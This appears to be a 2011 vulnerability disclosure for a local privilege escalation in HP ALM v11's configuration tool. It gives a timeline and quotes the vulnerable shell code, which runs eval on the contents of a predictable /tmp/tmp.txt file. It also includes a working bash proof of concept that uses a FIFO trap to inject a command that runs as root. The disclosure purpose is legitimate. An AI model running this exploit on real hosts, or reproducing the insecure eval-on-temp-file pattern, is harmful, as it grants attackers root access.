================
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

Description:

The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.

================
Timeline:

30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure

================
Exploit:

#!/bin/bash

Simple PoC : Run as user, when vulnerable function is called

/home/user/binary_to_run_as_root is run as root.

cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt # blocks for victim
while [ -e /tmp/tmp.txt ]; do
cat file > /tmp/tmp.txt
sleep 2
done
rm file

================
Details:

e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):

prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt